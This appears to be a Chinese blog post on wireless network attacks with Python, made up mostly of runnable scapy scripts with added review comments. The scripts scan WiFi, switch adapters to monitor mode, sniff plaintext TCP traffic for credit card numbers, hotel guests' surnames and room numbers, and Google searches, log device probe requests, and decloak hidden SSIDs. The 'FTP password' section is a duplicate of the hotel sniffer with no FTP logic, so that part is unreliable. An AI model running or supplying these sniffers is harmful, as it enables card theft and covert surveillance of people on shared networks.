  • 使用Python进行无线网络攻击

    PyWiFi 模块寻找 WiFi 来源

    # -*- coding: UTF-8 -*-
    import pywifi
    
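    def bies():
        """Scan with the first wireless interface and print each network found.

        One line is printed per scan result: the SSID followed by the signal
        value reported by pywifi. If pywifi reports no wireless interface, a
        message is printed and the function returns without scanning.
        """
        import time  # local import: this listing's header only imports pywifi

        wifi = pywifi.PyWiFi()  # create the wireless object
        interfaces = wifi.interfaces()
        if not interfaces:
            # interfaces()[0] would raise IndexError on a host without an adapter.
            print("no wireless interface found")
            return

        iface = interfaces[0]  # take the first wireless adapter
        iface.scan()  # only triggers the scan; results are collected asynchronously
        # Give the adapter a few seconds to finish, otherwise scan_results()
        # can return an empty or stale list.
        time.sleep(5)

        for network in iface.scan_results():
            print(network.ssid, network.signal)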
    
    
    # Script entry: run one scan and print the results.
    bies()

    WiFi 侦听模块

    import os
    from scapy.all import *
    
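    iface = "en0"

    # Ask iwconfig to switch the adapter to monitor mode. os.system() returns the
    # command's exit status; report a failure instead of silently capturing on an
    # interface whose mode was never changed.
    # NOTE(review): iface is a fixed string here. If it ever comes from user input,
    # pass the command as an argument list (subprocess) rather than building a
    # shell string by concatenation.
    if os.system("/usr/sbin/iwconfig " + iface + " mode monitor") != 0:
        print("iwconfig could not put " + iface + " into monitor mode")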
    
    # Dump packets that are not beacons, probe request / responses
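    def dump_packet(pkt):
        """Print a summary of *pkt*, plus a hexdump of its raw payload if it has one.

        Beacons, probe requests and probe responses are skipped. The condition is
        written inside parentheses because the listing as published lost its line
        continuations (and the newline escape in the final print), which made it
        a syntax error.
        """
        is_discovery_frame = (
            pkt.haslayer(Dot11Beacon)
            or pkt.haslayer(Dot11ProbeReq)
            or pkt.haslayer(Dot11ProbeResp)
        )
        if is_discovery_frame:
            return

        print(pkt.summary())

        if pkt.haslayer(Raw):
            # hexdump() prints the dump itself and returns None, so wrapping it in
            # print() would add a stray "None" line after every dump.
            hexdump(pkt.load)
        print("\n")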
    
    
    # Cycle through channels 1 to 13 forever, capturing briefly on each one.
    while True:
        for channel in range(1, 14):
            hop_command = "/usr/sbin/iwconfig {0} channel {1}".format(iface, channel)
            os.system(hop_command)
            print("Sniffing on channel {0}".format(channel))

            # Stop after 10 packets or 3 seconds, whichever comes first; store=0
            # keeps scapy from accumulating the captured packets in memory.
            sniff(iface=iface, prn=dump_packet, count=10, timeout=3, store=0)

    用Scapy测试无线网卡的嗅探功能

    测试嗅探无线网络的代码

    #!/usr/bin/python
    #coding=utf-8
    from scapy.all import *
    
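    def pktPrint(pkt):
        """Print a one-line label for the first layer of interest found in *pkt*.

        Layers are checked in a fixed order: 802.11 beacon, 802.11 probe request,
        TCP, then DNS. A packet carrying none of them prints nothing. print() is
        called as a function so the listing also parses on Python 3.
        """
        # Ordered (layer, message) pairs; the first layer present wins, which is
        # the same precedence as an if/elif chain.
        checks = (
            (Dot11Beacon, '[+] Detected 802.11 Beacon Frame'),
            (Dot11ProbeReq, '[+] Detected 802.11 Probe Request Frame'),
            (TCP, '[+] Detected a TCP Packet'),
            (DNS, '[+] Detected a DNS Packet'),
        )
        for layer, message in checks:
            if pkt.haslayer(layer):
                print(message)
                break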
    
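    conf.iface = 'wlan0mon'
    # store=0: the callback is all this script needs. Without it scapy keeps every
    # captured packet in memory for as long as the capture runs.
    sniff(prn=pktPrint, store=0)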

    使用Python正则表达式嗅探信用卡信息

    3种常用的信用卡:Visa、MasterCard和American Express。

    #!/usr/bin/python
    #coding=utf-8
    import re
    
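    def findCreditCard(raw):
        """Print the first American Express-style number found in the string *raw*.

        Nothing is printed when the pattern does not occur. print() is called as
        a function so the listing also parses on Python 3.
        """
        # American Express numbers are 15 digits long and start with 34 or 37.
        # NOTE(review): the pattern has no digit boundaries and no Luhn check, so
        # part of any longer digit run can match. A tool that logs hits should
        # mask the number instead of writing it out in full.
        amex_hits = re.findall(r'3[47][0-9]{13}', raw)
        if amex_hits:
            print('[+] Found American Express Card: ' + amex_hits[0])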
    
    def main():
        """Run findCreditCard over two fixed sample strings."""
        samples = [
            'I would like to buy 1337 copies of that dvd',
            'Bill my card: 378282246310005 for $2600',
        ]
        for sample in samples:
            findCreditCard(sample)

    if __name__ == '__main__':
        main()

    接着就加入Scapy来嗅探TCP数据包实现嗅探功能:

    #!/usr/bin/python
    #coding=utf-8
    import re
    import optparse
    from scapy.all import *
    
    def findCreditCard(pkt):
        """Print the first card-like number of each brand found in a packet's raw payload.

        The payload is taken from pkt.sprintf('%Raw.load%') and matched against
        one pattern per brand. Each brand is reported independently, so a single
        packet can produce up to three lines.

        NOTE(review): a passive capture only sees card numbers that travel
        unencrypted, so sending them over TLS keeps them out of this output.
        The patterns have no digit boundaries or Luhn check, so unrelated digit
        runs can match too.
        """
        raw = pkt.sprintf('%Raw.load%')
        # (pattern, message prefix) per brand, checked in this order:
        #   American Express: 15 digits starting with 34 or 37
        #   MasterCard: 16 digits starting with 51 through 55
        #   Visa: starts with 4, 13 or 16 digits long
        brands = (
            ('3[47][0-9]{13}', '[+] Found American Express Card: '),
            ('5[1-5][0-9]{14}', '[+] Found MasterCard Card: '),
            ('4[0-9]{12}(?:[0-9]{3})?', '[+] Found Visa Card: '),
        )
        for pattern, prefix in brands:
            hits = re.findall(pattern, raw)
            if hits:
                print prefix + hits[0]
    
    def main():
        """Parse -i <interface>, point scapy at it and sniff TCP traffic until Ctrl-C.

        When no interface is given, the usage string is printed and the process
        exits with status 0.
        """
        usage = '[*]Usage: python creditSniff.py -i <interface>'
        parser = optparse.OptionParser(usage)
        parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
        options, _ = parser.parse_args()

        # Nothing to listen on without an interface: show the usage text and stop.
        if options.interface is None:
            print parser.usage
            exit(0)
        conf.iface = options.interface

        try:
            print '[*] Starting Credit Card Sniffer.'
            # store=0 keeps scapy from holding the captured packets in memory.
            sniff(filter='tcp', prn=findCreditCard, store=0)
        except KeyboardInterrupt:
            exit(0)

    if __name__ == '__main__':
        main()

    嗅探宾馆住客

    #!/usr/bin/python
    #coding=utf-8
    import optparse
    from scapy.all import *
    
    def findGuest(pkt):
        """Print the LAST_NAME and ROOM_NUMBER values found in a packet's raw payload.

        Nothing is printed unless a LAST_NAME value is present.

        NOTE(review): a passive capture can only read these fields when the
        application sends them unencrypted. Serving the form over TLS removes
        them from view.
        NOTE(review): this listing does not import re itself. It presumably
        relies on the scapy star import to provide it; confirm.
        """
        payload = pkt.sprintf('%Raw.load%')
        # Both captures are greedy: (.*) runs to the last '&' (or "'") in the payload.
        surnames = re.findall('(?i)LAST_NAME=(.*)&', payload)
        rooms = re.findall("(?i)ROOM_NUMBER=(.*)'", payload)
        if not surnames:
            return
        # NOTE(review): rooms[0] raises IndexError when a payload carries LAST_NAME
        # but no ROOM_NUMBER match. Left as in the original.
        print '[+] Found Hotel Guest ' + str(surnames[0]) + ', Room #' + str(rooms[0])
    
    def main():
        """Parse -i <interface>, point scapy at it and sniff TCP traffic until Ctrl-C.

        When no interface is given, the usage string is printed and the process
        exits with status 0.
        """
        usage = '[*]Usage: python hotelSniff.py -i <interface>'
        parser = optparse.OptionParser(usage)
        parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
        options, _ = parser.parse_args()

        # Nothing to listen on without an interface: show the usage text and stop.
        if options.interface is None:
            print parser.usage
            exit(0)
        conf.iface = options.interface

        try:
            print '[*] Starting Hotel Guest Sniffer.'
            # store=0 keeps scapy from holding the captured packets in memory.
            sniff(filter='tcp', prn=findGuest, store=0)
        except KeyboardInterrupt:
            exit(0)

    if __name__ == '__main__':
        main()

    编写谷歌键盘记录器:

    Google搜索,由“q=”开始,中间是要搜索的字符串,并以“&”终止,字符“pg=”后接的是上一个搜索的内容。

    #!/usr/bin/python
    #coding=utf-8
    import optparse
    from scapy.all import *
    
    def findGoogle(pkt):
        """Print the search term from a raw payload that contains 'GET' and 'google'.

        The term is the text between '&q=' and the next '&'. '+' and '%20' are
        shown as spaces. Packets without a Raw layer, or without a match, print
        nothing.

        NOTE(review): only requests sent as plaintext are readable this way.
        Searches made over HTTPS do not expose the query string to a passive
        capture.
        NOTE(review): this listing does not import re itself. It presumably
        relies on the scapy star import to provide it; confirm.
        """
        if not pkt.haslayer(Raw):
            return
        payload = pkt.getlayer(Raw).load
        if 'GET' not in payload or 'google' not in payload:
            return

        matches = re.findall(r'(?i)&q=(.*?)&', payload)
        if not matches:
            return

        search = matches[0].split('&')[0]
        search = search.replace('q=', '').replace('+', ' ').replace('%20', ' ')
        print '[+] Searched For: ' + search
    
    def main():
        """Parse -i <interface>, point scapy at it and sniff TCP port 80 until Ctrl-C.

        When no interface is given, the usage string is printed and the process
        exits with status 0.
        """
        usage = '[*]Usage: python googleSniff.py -i <interface>'
        parser = optparse.OptionParser(usage)
        parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
        options, _ = parser.parse_args()

        # Nothing to listen on without an interface: show the usage text and stop.
        if options.interface is None:
            print parser.usage
            exit(0)
        conf.iface = options.interface

        try:
            print '[*] Starting Google Sniffer.'
            # NOTE(review): no store=0 here, unlike the page's other sniffers, so
            # scapy keeps every captured packet in memory while this runs.
            sniff(filter='tcp port 80', prn=findGoogle)
        except KeyboardInterrupt:
            exit(0)

    if __name__ == '__main__':
        main()

    嗅探FTP登录口令:(注:下面的代码与上文“嗅探宾馆住客”的示例完全相同,并不包含解析FTP口令的逻辑)

    #!/usr/bin/python
    #coding=utf-8
    import optparse
    from scapy.all import *
    
    def findGuest(pkt):
        """Print the LAST_NAME and ROOM_NUMBER values found in a packet's raw payload.

        Nothing is printed unless a LAST_NAME value is present. Despite the FTP
        heading above this listing, the function matches only these two form
        fields.

        NOTE(review): a passive capture can only read these fields when the
        application sends them unencrypted. Serving the form over TLS removes
        them from view.
        """
        raw_text = pkt.sprintf('%Raw.load%')
        # Both captures are greedy: (.*) runs to the last '&' (or "'") in the payload.
        last_names = re.findall('(?i)LAST_NAME=(.*)&', raw_text)
        room_numbers = re.findall("(?i)ROOM_NUMBER=(.*)'", raw_text)
        if not last_names:
            return
        # NOTE(review): room_numbers[0] raises IndexError when a payload carries
        # LAST_NAME but no ROOM_NUMBER match. Left as in the original.
        print '[+] Found Hotel Guest ' + str(last_names[0]) + ', Room #' + str(room_numbers[0])
    
    def main():
        """Parse -i <interface>, point scapy at it and sniff TCP traffic until Ctrl-C.

        When no interface is given, the usage string is printed and the process
        exits with status 0.
        """
        usage_text = '[*]Usage: python hotelSniff.py -i <interface>'
        parser = optparse.OptionParser(usage_text)
        parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
        options, _ = parser.parse_args()

        # Nothing to listen on without an interface: show the usage text and stop.
        if options.interface is None:
            print parser.usage
            exit(0)
        conf.iface = options.interface

        try:
            print '[*] Starting Hotel Guest Sniffer.'
            # store=0 keeps scapy from holding the captured packets in memory.
            sniff(filter='tcp', prn=findGuest, store=0)
        except KeyboardInterrupt:
            exit(0)

    if __name__ == '__main__':
        main()

    侦听无线 802.11 Probe请求

    #!/usr/bin/python
    #utf-8
    from scapy.all import *
    
    # Interface to capture on (presumably already in monitor mode, given the name).
    interface = 'wlan0mon'
    # Network names already reported by sniffProbe, so each is printed only once.
    probeReqs = []
    
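    def sniffProbe(p):
        """Print the network name from a probe request the first time it is seen.

        Names already recorded in the module-level probeReqs list are skipped.
        Frames without a Dot11ProbeReq layer are ignored.

        NOTE(review): probe requests are sent by client devices, so this output
        shows which network names nearby clients ask for.
        """
        if not p.haslayer(Dot11ProbeReq):
            return

        netName = p.getlayer(Dot11ProbeReq).info
        # On Python 3 the field is bytes and cannot be concatenated with str. On
        # Python 2 bytes is str, so this branch is skipped and nothing changes.
        if isinstance(netName, bytes) and not isinstance(netName, str):
            netName = netName.decode('utf-8', 'replace')

        if netName not in probeReqs:
            probeReqs.append(netName)
            print('[+] Detected New Probe Request: ' + netName)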
    
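    # store=0: the callback does all the work. Without it scapy keeps every
    # captured frame in memory for as long as the capture runs.
    sniff(iface=interface, prn=sniffProbe, store=0)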

    寻找隐藏网络的802.11信标

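    def sniffDot11(p):
        """Record and print the transmitter MAC of each beacon that has an empty SSID.

        Each MAC is reported once; it is then appended to hiddenNets. This
        fragment does not define hiddenNets itself. The complete listing further
        down the page declares it at module level.
        """
        if not p.haslayer(Dot11Beacon):
            return
        # `not info` matches the empty str on Python 2 and empty bytes on Python 3,
        # whereas `info == ''` is never true for bytes.
        if p.getlayer(Dot11Beacon).info:
            return

        addr2 = p.getlayer(Dot11).addr2
        if addr2 not in hiddenNets:
            print('[-] Detected Hidden SSID: with MAC:' + addr2)
            hiddenNets.append(addr2)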

    找出隐藏的802.11网络的网络名

    #!/usr/bin/python
    #coding=utf-8
    import sys
    from scapy import *
    
    # NOTE(review): this listing's header uses `from scapy import *`, while the
    # other listings on this page import from scapy.all. sniff and the Dot11
    # layers used below are presumably only available from scapy.all; confirm
    # the import before running.
    # Interface to capture on (presumably already in monitor mode, given the name).
    interface = 'wlan0mon'
    # Transmitter MACs (Dot11.addr2) whose beacons carried an empty SSID.
    hiddenNets = []
    # MACs from hiddenNets whose name has since been printed from a probe response.
    unhiddenNets = []
    
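    def sniffDot11(p):
        """Track beacons with an empty SSID and print the name once a probe response shows it.

        Beacon with an empty SSID: the transmitter MAC is printed once and
        appended to hiddenNets. Probe response from a MAC in hiddenNets: the
        SSID it carries is printed once and the MAC is appended to unhiddenNets.

        NOTE(review): the name still appears in probe responses, so leaving the
        SSID out of beacons does not keep it private and is not an access control.
        """
        if p.haslayer(Dot11ProbeResp):
            addr2 = p.getlayer(Dot11).addr2
            # Logical `and` rather than bitwise `&`: same result for these two
            # booleans, but it short-circuits and reads as intended.
            if addr2 in hiddenNets and addr2 not in unhiddenNets:
                netName = p.getlayer(Dot11ProbeResp).info
                # On Python 3 the field is bytes and cannot be concatenated with
                # str. On Python 2 bytes is str, so this branch is skipped.
                if isinstance(netName, bytes) and not isinstance(netName, str):
                    netName = netName.decode('utf-8', 'replace')
                print('[+] Decloaked Hidden SSID : ' + netName + ' for MAC: ' + addr2)
                unhiddenNets.append(addr2)

        if p.haslayer(Dot11Beacon):
            # `not info` matches the empty str on Python 2 and empty bytes on
            # Python 3, whereas `info == ''` is never true for bytes.
            if not p.getlayer(Dot11Beacon).info:
                addr2 = p.getlayer(Dot11).addr2
                if addr2 not in hiddenNets:
                    print('[-] Detected Hidden SSID: with MAC:' + addr2)
                    hiddenNets.append(addr2)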
    
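    # store=0: the callback does all the work. Without it scapy keeps every
    # captured frame in memory for as long as the capture runs.
    sniff(iface=interface, prn=sniffDot11, store=0)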
  • 原文地址:https://www.cnblogs.com/LyShark/p/9100981.html